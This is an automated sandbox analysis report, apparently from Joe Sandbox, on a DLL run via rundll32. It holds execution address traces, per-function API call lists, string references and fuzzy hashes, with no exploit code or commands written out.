0x615a83a9
0x615a83ae
0x615a83b7
0x615a83bc
0x615a83c1
0x615a83d2
0x615a83d7
0x615a83dd
0x615a83df
0x615a83e4
0x615a83e9
0x615a83ee
0x615a83f6
0x615a83fa
0x615a83fe
0x615a8403
0x615a8408
0x615a8408
0x00000000
0x615a83a0
0x615a8346
0x615a8349
0x00000000
0x615a8349
0x615a85aa
0x615a85af
0x615a85b4
0x615a85ba
0x615a85c2
0x615a85ca
0x615a85d2
0x615a85d2
0x615a85d4
0x615a85dc
0x615a85ed
0x615a85f5
0x615a8604
0x615a8609
0x615a8611
0x615a8611
0x615a8612
0x615a8616
0x615a861e
0x615a8626
0x615a862a
0x615a8632
0x615a863a
0x615a863e
0x615a8642
0x615a8646
0x615a8646
0x615a8650
0x615a8653
0x615a8658
0x615a865b
0x615a865e
0x615a8665
0x615a8668
0x615a88d0
0x615a88d0
0x615a88d5
0x615a88d5
0x615a88db
0x615a88e0
0x615a88f1
0x615a88f9
0x615a8905
0x615a890a
0x615a890f
0x615a890f
0x615a8910
0x615a8914
0x615a891c
0x615a8924
0x615a8928
0x615a8930
0x615a8938
0x615a893c
0x615a8940
0x615a8944
0x615a8944
0x615a894e
0x615a8951
0x615a895a
0x615a895c
0x615a8963
0x615a896a
0x615a89ea
0x615a89ec
0x615a89ec
0x615a89f4
0x615a89c2
0x615a89c5
0x615a89d3
0x615a89dd
0x615a89dd
0x615a8974
0x615a8979
0x615a897c
0x615a897e
0x00000000
0x00000000
0x615a8980
0x615a8987
0x615a899a
0x615a8989
0x615a898b
0x615a8993
0x615a8993
0x615a89a5
0x615a89bf
0x00000000
0x615a89bf
0x615a866e
0x615a8673
0x615a8676
0x615a8685
0x615a8689
0x615a868e
0x615a86d7
0x615a86d7
0x615a86da
0x615a86e0
0x615a86e0
0x615a86e0
0x615a86e3
0x615a86e5
0x00000000
0x00000000
0x615a86ed
0x615a86ed
0x615a86f0
0x615a86f6
0x615a86f6
0x615a86f8
0x615a86fa
0x615a86fd
0x615a86fe
0x615a8700
0x615a8703
0x615a8706
0x00000000
0x00000000
0x615a8712
0x615a8718
0x615a871b
0x615a8722
0x615a8726
0x615a8729
0x615a872b
0x615a872f
0x615a873b
0x615a873f
0x615a874c
0x615a8750
0x615a8763
0x615a8767
0x615a8769
0x615a876f
0x615a876f
0x615a876f
0x615a876f
0x615a8752
0x615a875d
0x615a875d
0x615a8741
0x615a8747
0x615a8747
0x615a8731
0x615a8736
0x615a8736
0x615a8776
0x615a8779
0x615a877c
0x615a877c
0x615a8788
0x615a878a
0x615a878d
0x615a879d
0x615a87a5
0x615a87ad
0x615a87b5
0x615a87bd
0x615a87bd
0x615a87c5
0x615a87c8
0x615a87d0
0x615a87d8
0x615a87da
0x615a87e0
0x615a87e3
0x615a87e6
0x615a87eb
0x615a87f3
0x615a87f6
0x615a87fa
0x615a87fa
0x615a8802
0x615a880a
0x615a880d
0x615a880e
0x615a8811
0x00000000
0x00000000
0x615a8813
0x615a8820
0x615a8820
0x615a8829
0x615a882b
0x615a8830
0x615a8833
0x615a8837
0x615a883c
0x615a8840
0x615a8843
0x615a8847
0x615a884a
0x615a884e
0x615a8852
0x615a8856
0x615a8859
0x615a885c
0x615a8860
0x615a8864
0x615a8867
0x615a886b
0x615a8870
0x615a8877
0x615a8878
0x615a8878
0x615a887d
0x615a887d
0x615a8885
0x615a8888
0x615a88bd
0x615a88c3
0x615a888a
0x615a888a
0x615a888c
0x615a8891
0x615a8899
0x615a889c
0x615a88a0
0x615a88a4
0x615a88a8
0x615a88b0
0x615a88b4
0x615a88b4
0x615a8888
0x615a87bd
0x615a8792
0x615a8795
0x615a8795
0x00000000
0x615a86e0
0x615a8690
0x615a8690
0x615a8692
0x615a8692
0x615a8698
0x615a8699
0x615a869a
0x615a869f
0x615a86a3
0x615a86a6
0x615a86b3
0x615a86b5
0x615a86b7
0x615a86b9
0x615a86be
0x615a86c6
0x615a86ca
0x615a86ce
0x615a86ce
0x615a86d4
0x00000000
0x615a86d4
0x615a867e
0x615a8680
0x00000000
0x615a8680
0x615a7f90
0x615a7f88
0x615a7d47
0x615a7d4f
0x615a7d4f
0x615a7d52
0x615a7d57
0x615a7d5a
0x615a7d5b
0x615a7d5e
0x615a7d61
0x615a7d92
0x615a7d97
0x615a7d9a
0x615a7d9b
0x615a7d9e
0x615a7db9
0x615a7dbb
0x615a7dbd
0x615a7dc5
0x615a7dca
0x615a7dcb
0x615a7dcc
0x615a7dd1
0x615a7da0
0x615a7da5
0x615a7da5
0x615a7da9
0x615a7dae
0x615a7db2
0x615a7db2
0x615a7dd4
0x615a7ddc
0x615a7de4
0x615a7de9
0x615a7df0
0x615a7df0
0x615a7df6
0x615a7dfb
0x615a7e02
0x615a7e03
0x615a7e04
0x615a7e05
0x615a7e0a
0x615a7e0e
0x615a7e13
0x615a7e1d
0x615a7e22
0x615a7e25
0x615a7e29
0x615a7e2e
0x615a7e32
0x615a7e37
0x615a7e3b
0x615a7e41
0x615a7e47
0x615a7e48
0x615a7e48
0x615a7e48
0x615a7e4b
0x615a7e4e
0x615a7e52
0x615a7e55
0x615a7e59
0x615a7e5e
0x615a7e62
0x615a7e67
0x615a7e6a
0x615a7e6a
0x615a7e75
0x615a7e7d
0x00000000
0x615a7e7d
0x615a7d68
0x615a7d6b
0x615a7d71
0x615a7d74
0x615a7d76
0x615a7d8a
0x615a7d8a
0x00000000
0x00000000
0x00000000
0x00000000
0x615a7d78
0x615a7d78
0x615a7d78
0x615a7d7a
0x615a7d7d
0x615a7d7f
0x615a7d82
0x615a7d82
0x615a7d82
0x615a7d87
0x00000000
0x615a7e80
0x615a7e80
0x615a7e85
0x615a7e85
0x00000000
0x615a7d57
0x00000000
0x00000000
0x00000000
0x615a7bd8
0x615a7bd8
0x615a7bd8
0x615a7bd9
0x615a7bdb
0x615a7bdd
0x615a7be3
0x615a7be6
0x615a7be8
0x615a7be9
0x615a7bec
0x615a7bee
0x615a7bee
0x615a7bef
0x615a7bf2
0x615a7bf2
0x615a7bf5
0x615a7bf5
0x00000000
0x615a7bd8
0x615a89fd
0x615a89fd
0x615a89fe
0x615a8a04
0x615a8a04

APIs

__aulldiv.LIBCMT ref: 615A6692
__aullrem.LIBCMT ref: 615A66C6
GetTickCount64.KERNEL32 ref: 615A676C
GetTickCount64.KERNEL32 ref: 615A6772
GetTickCount64.KERNEL32 ref: 615A67A1
GetTickCount64.KERNEL32 ref: 615A67A7
GetShellWindow.USER32 ref: 615A6927
GetOEMCP.KERNEL32 ref: 615A69D2

Part of subcall function 615A5D90: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 615A5E04
Part of subcall function 615A5D90: SwitchToThread.KERNEL32(00000000,?,?,?,?,?,?), ref: 615A5E74
Part of subcall function 615A5D90: GetOpenClipboardWindow.USER32(00000000,?,?,?), ref: 615A5E93
Part of subcall function 615A5D90: GetACP.KERNEL32(00000000,?,?,?), ref: 615A5EA4

CoFreeUnusedLibraries.OLE32 ref: 615A6A30

Part of subcall function 615A5A30: GetOpenClipboardWindow.USER32(00000000,?,00000000,615A6431,0000002E,00000000,00000000,?,0000002E,00000000), ref: 615A5A3C
Part of subcall function 615A5A30: CloseClipboard.USER32 ref: 615A5A73
Part of subcall function 615A5A30: GetMenuCheckMarkDimensions.USER32 ref: 615A5B30

Strings

?, xrefs: 615A691B

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: Count64Tick$ClipboardWindow$Open$CheckCloseDimensionsFreeLibrariesMarkMenuShellSwitchThreadUnothrow_t@std@@@Unused__aulldiv__aullrem__ehfuncinfo$??2@
String ID: ?
API String ID: 1511855008-1684325040
Opcode ID: ab5d8d2ce3bb47cf463dd3c3f750ff93acea654b75a2432fa90a6ffc8c30e990
Instruction ID: 140c26ef7c75d7a3046ca1c733313dfd650f30153c78173776a75ad10175105e
Opcode Fuzzy Hash: ab5d8d2ce3bb47cf463dd3c3f750ff93acea654b75a2432fa90a6ffc8c30e990
Instruction Fuzzy Hash: 85137A31D20A5D8ACB12DFBAC88069DF7B1AF9A340F15C796E81977191EB3069C5DF40

Uniqueness

Uniqueness Score: -1.00%

Function 615C6DE0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 615CDD03: GetEnvironmentStringsW.KERNEL32 ref: 615CDD0C
Part of subcall function 615CDD03: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 615CDD2F
Part of subcall function 615CDD03: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 615CDD55
Part of subcall function 615CDD03: _free.LIBCMT ref: 615CDD68
Part of subcall function 615CDD03: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 615CDD77

_free.LIBCMT ref: 615C6E26
_free.LIBCMT ref: 615C6E2D

Strings

?G, xrefs: 615C6DE0, 615C6E13

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
String ID: ?G
API String ID: 400815659-2003460605
Opcode ID: 59738c5cc9427b6de3272990144d030f187654f6577e31d2b4fdcc8da18a87ee
Instruction ID: 5499f2ed5509fd8268a0d63fe8ca73f424aa9785c6ddc835db3214d66057b05d
Opcode Fuzzy Hash: 59738c5cc9427b6de3272990144d030f187654f6577e31d2b4fdcc8da18a87ee
Instruction Fuzzy Hash: 92E0A71398A7421DA1615EF9EC00A6F97964BC2B3C796861FD524CA2C1CB608D420997

Uniqueness

Uniqueness Score: -1.00%

Function 615B67A5, Relevance: 3.0, APIs: 2, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 615B67AC
std::locale::_Init.LIBCPMT ref: 615B67CD

Part of subcall function 615B5FD3: __EH_prolog3.LIBCMT ref: 615B5FDA
Part of subcall function 615B5FD3: std::_Lockit::_Lockit.LIBCPMT ref: 615B5FE5
Part of subcall function 615B5FD3: std::locale::_Setgloballocale.LIBCPMT ref: 615B6000
Part of subcall function 615B5FD3: _Yarn.LIBCPMT ref: 615B6016
Part of subcall function 615B5FD3: std::_Lockit::~_Lockit.LIBCPMT ref: 615B6056

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 3152668004-0
Opcode ID: 5cbe467148f33879b04b576ee2aad31a7cbdd4132dfdd5379d676eaf360559e3
Instruction ID: aaff3ee0b33e80c78ef2dcc0cc2acd4ec918935dacbb3a68d016cee638b566ed
Opcode Fuzzy Hash: 5cbe467148f33879b04b576ee2aad31a7cbdd4132dfdd5379d676eaf360559e3
Instruction Fuzzy Hash: 1AE0DFB2E027235BD3205BAC842231DE5906FC0B14F14C55AD5109F6C0CBB04C0053CA

Uniqueness

Uniqueness Score: -1.00%

Function 615D62EB, Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 615CCCCD: RtlAllocateHeap.NTDLL(00000008,000000FF,00000000,?,615CA438,00000001,00000364,00000006,000000FF,?,615C731A,000000FF,000000FF), ref: 615CCD0E

_free.LIBCMT ref: 615D6357

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: d79b022c032317f0fc4250b06a3dbaf287368575d4d977daa84b206efbe08d59
Instruction ID: 6162b3912179101c5682ffb6899c8500a17d85d8d4797668f8d997d7e077b4ae
Opcode Fuzzy Hash: d79b022c032317f0fc4250b06a3dbaf287368575d4d977daa84b206efbe08d59
Instruction Fuzzy Hash: 5B01F9736443456BE321CFA9D84195EFBEDEBC5370F25461DE59483280EB30A846C778

Uniqueness

Uniqueness Score: -1.00%

Function 615CCCCD, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,000000FF,00000000,?,615CA438,00000001,00000364,00000006,000000FF,?,615C731A,000000FF,000000FF), ref: 615CCD0E

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 62bbeb9c0682f025413bb70446b4b5037fc504dba0715201c59344ba761c5363
Instruction ID: 737108a954d0dc4d83d01766e55e4d4f60955af08c6077b38dcdc8a942999ca1
Opcode Fuzzy Hash: 62bbeb9c0682f025413bb70446b4b5037fc504dba0715201c59344ba761c5363
Instruction Fuzzy Hash: BBF0B43255526667FB115EE68800A5EFF59AFC2EB0B12C41DAC29E6280CF20D84087A7

Uniqueness

Uniqueness Score: -1.00%

Function 615D17FC, Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 615C9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,615B8F9C,00000105,000000FF,FFFFFFFF,00000000,?,615A1687,?,00000103,000000FF), ref: 615C9C04

_free.LIBCMT ref: 615D181C

Part of subcall function 615C9B98: HeapFree.KERNEL32(00000000,00000000,?,615C731A,000000FF,000000FF), ref: 615C9BAE
Part of subcall function 615C9B98: GetLastError.KERNEL32(615C6995,?,615C731A,000000FF,000000FF), ref: 615C9BC0

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: 741b6e02e0ce8b366ea3157cfdd4f5807030914f3e838edec61185a4a43fd9a8
Instruction ID: bf4ad935e7e94a8b642d81b87b3f0584dc67c06570851db9610488579fdb9b62
Opcode Fuzzy Hash: 741b6e02e0ce8b366ea3157cfdd4f5807030914f3e838edec61185a4a43fd9a8
Instruction Fuzzy Hash: FAF06DB24057059FE324CF44D881B52F7F8EB44719F10C82ED2AA87A91CB78A844CB98

Uniqueness

Uniqueness Score: -1.00%

Function 615C9BD2, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,615B8F9C,00000105,000000FF,FFFFFFFF,00000000,?,615A1687,?,00000103,000000FF), ref: 615C9C04

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a2f3856412b71f9cc453a7b9a549586c54598b823da3b48e19bb8fdd4b11dc6a
Instruction ID: 90d436fbc4a99739813f9fc35c14b70bbede84cb7c89b81846cc1d9ce3d3c3eb
Opcode Fuzzy Hash: a2f3856412b71f9cc453a7b9a549586c54598b823da3b48e19bb8fdd4b11dc6a
Instruction Fuzzy Hash: AFE0A035145221AAFB115EF5C98075EFB899B82FACF4284289C1892180CF20988086AB

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 615AF700, Relevance: 37.2, APIs: 18, Strings: 3, Instructions: 404stringmemoryCOMMON

Download Yara Rule

APIs

CoTaskMemAlloc.OLE32(615AED98,3F3F20BC,00000000,00000000), ref: 615AF79A
CharNextW.USER32(?,00000000), ref: 615AF819
CharNextW.USER32(00000000,?,00000000), ref: 615AF81E
CharNextW.USER32(00000000,?,00000000), ref: 615AF823
CharNextW.USER32(00000000,?,00000000), ref: 615AF828
CharNextW.USER32(?,?,3F3F20BC,00000000,00000000), ref: 615AF85F
CharNextW.USER32(?,?,3F3F20BC,00000000,00000000), ref: 615AF86F
CharNextW.USER32(00000000,?,3F3F20BC,00000000,00000000), ref: 615AF8CE
CoTaskMemFree.OLE32(00000000,3F3F20BC,00000000,00000000), ref: 615AF8F3
lstrcmpiW.KERNEL32(?,?,?,3F3F20BC,00000000,00000000), ref: 615AF94E
CoTaskMemFree.OLE32(00000000,?,3F3F20BC,00000000,00000000), ref: 615AF966
CharNextW.USER32(?,?,3F3F20BC,00000000,00000000), ref: 615AF9B3
CharNextW.USER32(?,3F3F20BC,00000000,00000000), ref: 615AF9C3
CoTaskMemFree.OLE32(00000000,?,3F3F20BC,00000000,00000000), ref: 615AF9E5
CoTaskMemFree.OLE32(00000000,3F3F20BC,00000000,00000000), ref: 615AFA03
lstrcmpiW.KERNEL32(?,615E8D3C,?,?,C000008C,00000000,00000000), ref: 615AFABD
CoTaskMemFree.OLE32(00000000,C000008C,00000000,00000000), ref: 615AFADC
CharNextW.USER32(?,?,00000000,00000000,00000000,?,?,C000008C,00000000,00000000), ref: 615AFBA1

Strings

}}, xrefs: 615AF8B0
HKCR, xrefs: 615AF800
HKCU{Software{Classes, xrefs: 615AF82A

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: CharNext$Task$Free$lstrcmpi$Alloc
String ID: }}$HKCR$HKCU{Software{Classes
API String ID: 2337762536-1142484189
Opcode ID: 0f0167d553369666071282ce578a53c0ab2e4f1c85e12ddd625153e9503b0588
Instruction ID: 3adee2f19992f15d2cfd80eafaaab63d623337492ff742946db667f5b115d12b
Opcode Fuzzy Hash: 0f0167d553369666071282ce578a53c0ab2e4f1c85e12ddd625153e9503b0588
Instruction Fuzzy Hash: FBE1A031E4021A9FEF119FA4C8A4B9EFBF5EF45304F11856AE915EB280EB709D44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 615B1CD0, Relevance: 26.7, APIs: 12, Strings: 3, Instructions: 462COMMON

Download Yara Rule

APIs

PdhCollectQueryData.PDH(?,3F3F20BC,?,?,?,?,615D9DAB,000000FF), ref: 615B1D77
PdhGetFormattedCounterValue.PDH(?,00000200,00000000,?,?,?,615D9DAB,000000FF), ref: 615B1DE1
GetTextMetricsW.GDI32(?,?,00000010,?), ref: 615B1F40
GetClientRect.USER32 ref: 615B224B
GetDeviceCaps.GDI32(?,0000005A), ref: 615B22C0
MulDiv.KERNEL32(?,00000000,00000048), ref: 615B22D5
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 615B22FA
SetTextColor.GDI32(?,?), ref: 615B2312
SelectObject.GDI32(?,00000000), ref: 615B231A
DrawTextW.USER32(?,?,?,?,00000000), ref: 615B2356
SelectObject.GDI32(?,00000000), ref: 615B2363
DeleteObject.GDI32(00000000), ref: 615B236A

Strings

[N/A], xrefs: 615B2117
%s%s%s, xrefs: 615B21F2
%s%d.%d%s, xrefs: 615B2198

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: ObjectText$Select$CapsClientCollectColorCounterCreateDataDeleteDeviceDrawFontFormattedMetricsQueryRectValue
String ID: %s%d.%d%s$%s%s%s$[N/A]
API String ID: 4229994797-711029782
Opcode ID: e3e48ea985cbb493ef1f0e03d0aaa75fc87ac4bd004c713b0059015c8d31d006
Instruction ID: 7b5890cb05e72e7d5a06c231a87eeffe6b84ef64457a9b1434740e8a9c6ffa27
Opcode Fuzzy Hash: e3e48ea985cbb493ef1f0e03d0aaa75fc87ac4bd004c713b0059015c8d31d006
Instruction Fuzzy Hash: 7C123675D006299BDB24CF28CC90ADAF7B5BF49304F4582D9E419A7261D730AEC5CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 615A5EE0, Relevance: 19.9, APIs: 13, Instructions: 427threadclipboardCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?,0000002E,00000000,?,?,?,?,?,?,615A6935), ref: 615A6183
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 615A61A1
AnyPopup.USER32 ref: 615A6305
GetCurrentThread.KERNEL32 ref: 615A6401

Part of subcall function 615A5A30: IsSystemResumeAutomatic.KERNEL32 ref: 615A5BA0

GetUserDefaultUILanguage.KERNEL32(00000000,?,0000002E,00000000,?,?,?,?,?,?,615A6935), ref: 615A6355

Part of subcall function 615A5A30: GetOpenClipboardWindow.USER32(00000000,?,00000000,615A6431,0000002E,00000000,00000000,?,0000002E,00000000), ref: 615A5A3C
Part of subcall function 615A5A30: CloseClipboard.USER32 ref: 615A5A73
Part of subcall function 615A5A30: GetMenuCheckMarkDimensions.USER32 ref: 615A5B30

GetErrorMode.KERNEL32(0000002E,00000000,?,?,?,?,?,?,615A6935), ref: 615A6448
GetThreadErrorMode.KERNEL32(?,?,?,?,?,?,615A6935), ref: 615A64B0
GetClipboardViewer.USER32 ref: 615A5F76

Part of subcall function 615A5C20: UnregisterApplicationRestart.KERNEL32 ref: 615A5C40
Part of subcall function 615A5C20: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 615A5CAC

GetSystemDefaultLangID.KERNEL32 ref: 615A5FE3
GetOpenClipboardWindow.USER32(?,-00000003,00000000,?,?,?,?,?,?,615A6935), ref: 615A6052
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 615A6081
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 615A6108
GetCurrentThread.KERNEL32 ref: 615A612E

Part of subcall function 615A5D90: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 615A5E04
Part of subcall function 615A5D90: SwitchToThread.KERNEL32(00000000,?,?,?,?,?,?), ref: 615A5E74
Part of subcall function 615A5D90: GetOpenClipboardWindow.USER32(00000000,?,?,?), ref: 615A5E93
Part of subcall function 615A5D90: GetACP.KERNEL32(00000000,?,?,?), ref: 615A5EA4

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: ClipboardUnothrow_t@std@@@__ehfuncinfo$??2@$ThreadWindow$Open$CurrentDefaultErrorModeSystem$ApplicationAutomaticCheckCloseDimensionsForegroundLangLanguageMarkMenuPopupRestartResumeSwitchUnregisterUserViewer
String ID:
API String ID: 2542842856-0
Opcode ID: 2f0aa211de6fcaf0c1779b41b654eaa7dc705dfc56fc73e18dc1bdb56138e410
Instruction ID: 4593a7d5a709fd875b0a43c25ee7c5000ea1e0ca4dec88db008b7b5133116965
Opcode Fuzzy Hash: 2f0aa211de6fcaf0c1779b41b654eaa7dc705dfc56fc73e18dc1bdb56138e410
Instruction Fuzzy Hash: BFE11571D24B494EC213DE3A841155FF3ABAFEB6C8F05C726F406B6152FB2498D29A81

Uniqueness

Uniqueness Score: -1.00%

Function 615B83A7, Relevance: 12.1, APIs: 8, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,615B8550,00000000), ref: 615B83CB
HeapAlloc.KERNEL32(00000000), ref: 615B83D2

Part of subcall function 615B849D: IsProcessorFeaturePresent.KERNEL32(0000000C,615B83B9,00000000,?,615B8550,00000000), ref: 615B849F

InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,615B8550,00000000), ref: 615B83E2
VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 615B8409
RaiseException.KERNEL32(C0000017,00000000,00000000,00000000), ref: 615B841D
InterlockedPopEntrySList.KERNEL32(00000000), ref: 615B8430
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 615B8443

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
String ID:
API String ID: 2460949444-0
Opcode ID: 420e862a01c5e16b42578caa4c3ad3b59d56f9a046e238604a753b8430f027c5
Instruction ID: b6c5f31f4f2d65ac3e8493f67991b0a93bcdc19ecd86c1c59bca470300b11bec
Opcode Fuzzy Hash: 420e862a01c5e16b42578caa4c3ad3b59d56f9a046e238604a753b8430f027c5
Instruction Fuzzy Hash: B6110331A11613AFEB116AF88C58F1EFA6AEB47749F07C428F924D2240DB34DC405BA6

Uniqueness

Uniqueness Score: -1.00%

Function 615AEBD0, Relevance: 10.7, APIs: 7, Instructions: 162libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000060), ref: 615AEC5D
